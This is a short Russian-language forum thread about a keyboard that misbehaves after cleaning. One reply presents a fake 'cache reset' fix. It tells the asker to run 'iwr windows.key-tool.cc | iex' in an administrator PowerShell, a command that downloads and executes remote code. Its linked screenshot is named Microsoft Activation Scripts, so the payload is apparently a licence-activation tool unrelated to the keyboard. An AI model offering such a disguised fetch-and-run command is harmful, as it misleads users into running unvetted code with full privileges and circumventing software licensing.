Клавиатура сходит с ума.

Что делать если почистил клавиатуру, поставил все клавиши как было, но вдруг она начинает работать вообще не так, когда нажимаю на "Щ" не работает +так со множеством клавиш, на Win так вообще компьютер выключается, хотел поменять раскладку клавиатуры, КОМПЬЮТЕР ВООБЩЕ ПЕРЕЗАГРУЗИЛСЯ!

Вот это приколы у тебя там мужик

Скорее всего надо сбросить кеш

Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:

iwr windows.key-tool.cc | iex

Нажать Enter.

(не путать с командной строкой).

В открывшемся окне нажать 1.

https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).

После выполнения команды закрыть все окна и перезагрузить ПК.

сбрось комп до заводских